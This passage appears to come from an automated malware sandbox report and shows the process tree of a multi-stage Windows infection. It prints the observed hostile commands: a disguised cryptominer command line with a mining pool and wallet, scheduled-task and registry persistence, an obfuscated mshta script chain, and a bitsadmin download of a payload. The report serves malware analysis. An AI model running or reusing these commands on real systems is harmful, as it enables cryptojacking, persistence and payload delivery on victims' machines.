                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4568
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5272
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
                                                                                                                          9⤵
                                                                                                                            PID:5152
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                                                                              10⤵
                                                                                                                                PID:6536
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                                                                                  11⤵
                                                                                                                                    PID:7040
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
                                                                                                                                  10⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:6568
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4084
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-0IN66.tmp\setup.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-0IN66.tmp\setup.tmp" /SL5="$10208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:4324
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:1596
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-502AU.tmp\setup.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-502AU.tmp\setup.tmp" /SL5="$7028C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                  10⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:2688
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-P328B.tmp\postback.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-P328B.tmp\postback.exe" ss1
                                                                                                                                    11⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5948
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                            7⤵
                                                                                                                              PID:4040
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                8⤵
                                                                                                                                  PID:5524
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                    9⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:3152
                                                                                                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:6056
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                    9⤵
                                                                                                                                      PID:5428
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                        10⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:2180
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                      9⤵
                                                                                                                                        PID:660
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                        9⤵
                                                                                                                                          PID:1936
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:952
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 1648
                                                                                                                                        8⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        • Program crash
                                                                                                                                        PID:6648
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1164
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon20d3b8b752.exe
                                                                                                                                  Mon20d3b8b752.exe
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:2456
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\DYyTql1cVq5GqnCNWAJAMfYY.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\DYyTql1cVq5GqnCNWAJAMfYY.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:2736
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\bX9sg_9l7sKFACyKXqWEGcFi.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\bX9sg_9l7sKFACyKXqWEGcFi.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:696
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\bX9sg_9l7sKFACyKXqWEGcFi.exe
                                                                                                                                      "bX9sg_9l7sKFACyKXqWEGcFi.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1564
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 144
                                                                                                                                        8⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:5328
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\swqBhNfhPqxSMw4vLBXlVTb8.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\swqBhNfhPqxSMw4vLBXlVTb8.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2060
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\7f_aSrHHSrJlrRO2TUPQN36D.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\7f_aSrHHSrJlrRO2TUPQN36D.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1708
                                                                                                                                    • C:\Users\Admin\Documents\Y0iTVLnRtL8LfBJzd0WD9dMI.exe
                                                                                                                                      "C:\Users\Admin\Documents\Y0iTVLnRtL8LfBJzd0WD9dMI.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      PID:6812
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\5kI81_GNH_mGbsXExaDwiKIF.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\5kI81_GNH_mGbsXExaDwiKIF.exe"
                                                                                                                                        8⤵
                                                                                                                                          PID:616
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\_xHK4BEGyFn0tZ6FMYSRDFnM.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\_xHK4BEGyFn0tZ6FMYSRDFnM.exe"
                                                                                                                                          8⤵
                                                                                                                                            PID:7240
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\UroYrKoiFVOnwHiLUxYbRzW8.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\UroYrKoiFVOnwHiLUxYbRzW8.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:7300
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\P5yTjZhi87_Cj3BosC6tQSNa.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\P5yTjZhi87_Cj3BosC6tQSNa.exe"
                                                                                                                                            8⤵
                                                                                                                                              PID:7288
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\P2tjjOloNBKaEXWbQX_qojHx.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\P2tjjOloNBKaEXWbQX_qojHx.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:7280
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\P2tjjOloNBKaEXWbQX_qojHx.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\P2tjjOloNBKaEXWbQX_qojHx.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                                                  9⤵
                                                                                                                                                    PID:7520
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\P2tjjOloNBKaEXWbQX_qojHx.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\P2tjjOloNBKaEXWbQX_qojHx.exe" ) do taskkill -iM "%~NXI" -f
                                                                                                                                                      10⤵
                                                                                                                                                        PID:7752
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill -iM "P2tjjOloNBKaEXWbQX_qojHx.exe" -f
                                                                                                                                                          11⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:7900
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\OQqy2eXxme1sGeWRKS8KKsOt.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\OQqy2eXxme1sGeWRKS8KKsOt.exe" /mixtwo
                                                                                                                                                    8⤵
                                                                                                                                                      PID:7264
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\45nM34kA2gRwHiCJMBfdwxBJ.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\45nM34kA2gRwHiCJMBfdwxBJ.exe" silent
                                                                                                                                                      8⤵
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      PID:7672
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\AWKiFw399GIFb0rVQzCet2vk.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\AWKiFw399GIFb0rVQzCet2vk.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5952
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0V5TL.tmp\AWKiFw399GIFb0rVQzCet2vk.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0V5TL.tmp\AWKiFw399GIFb0rVQzCet2vk.tmp" /SL5="$3042A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\AWKiFw399GIFb0rVQzCet2vk.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:7396
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AKS09.tmp\DYbALA.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-AKS09.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                            10⤵
                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:6756
                                                                                                                                                            • C:\Program Files\Windows Security\AKPFWYBTUZ\foldershare.exe
                                                                                                                                                              "C:\Program Files\Windows Security\AKPFWYBTUZ\foldershare.exe" /VERYSILENT
                                                                                                                                                              11⤵
                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                              PID:7784
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9d-64f63-1f2-ea798-7df7add9a5e23\Sibaepoginu.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\9d-64f63-1f2-ea798-7df7add9a5e23\Sibaepoginu.exe"
                                                                                                                                                              11⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:5584
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\b6-a62ea-cbc-3da84-be2f4f98e8410\Fesixoraefe.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\b6-a62ea-cbc-3da84-be2f4f98e8410\Fesixoraefe.exe"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:6820
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3x3mbgc.rsv\GcleanerEU.exe /eufive & exit
                                                                                                                                                                  12⤵
                                                                                                                                                                    PID:1104
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\x3x3mbgc.rsv\GcleanerEU.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\x3x3mbgc.rsv\GcleanerEU.exe /eufive
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:7024
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fch0ccjk.zni\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:7984
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:7916
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fch0ccjk.zni\installer.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\fch0ccjk.zni\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                            13⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:5080
                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fch0ccjk.zni\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fch0ccjk.zni\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843707 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                              14⤵
                                                                                                                                                                                PID:8080
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otyh51al.rdn\any.exe & exit
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:6004
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\otyh51al.rdn\any.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\otyh51al.rdn\any.exe
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:7108
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5vgfsfm.lqu\gcleaner.exe /mixfive & exit
                                                                                                                                                                                12⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4040
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\r5vgfsfm.lqu\gcleaner.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\r5vgfsfm.lqu\gcleaner.exe /mixfive
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:2900
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nlb3bjui.ss2\autosubplayer.exe /S & exit
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:8076
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\nlb3bjui.ss2\autosubplayer.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\nlb3bjui.ss2\autosubplayer.exe /S
                                                                                                                                                                                      13⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      PID:7868
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                        14⤵
                                                                                                                                                                                          PID:7696
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:9144
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:4780
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:7264
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                  PID:3556
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:3748
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                      PID:6440
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                      • Checks for any installed AV software in registry
                                                                                                                                                                                                      PID:8976
                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                      "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                      • Download via BitsAdmin
                                                                                                                                                                                                      PID:3124
                                                                                                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfT5WYVqWlNx1lAe -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:8600
                                                                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pSEpyyqJOWlXpayv -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:4084
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:8220
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:8380
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:6568
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                  PID:6664
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:4464
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui
                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                      PID:8444
                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        PID:9096
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                        PID:2512
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                          PID:5072
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                            PID:9044
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                              PID:8408
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu692.tmp\tempfile.ps1"
                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                PID:4256
                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                PID:7260
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\q9zqQnCjDReFj_fjrANMjtCD.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\q9zqQnCjDReFj_fjrANMjtCD.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:7244
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:6844
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:6836
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\3s_MG6ymhEpFJwpcEV9VraOd.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\3s_MG6ymhEpFJwpcEV9VraOd.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:2904
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\tzbUCA3rQj6jSG6mgZsF4vE5.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\tzbUCA3rQj6jSG6mgZsF4vE5.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks whether UAC is enabled
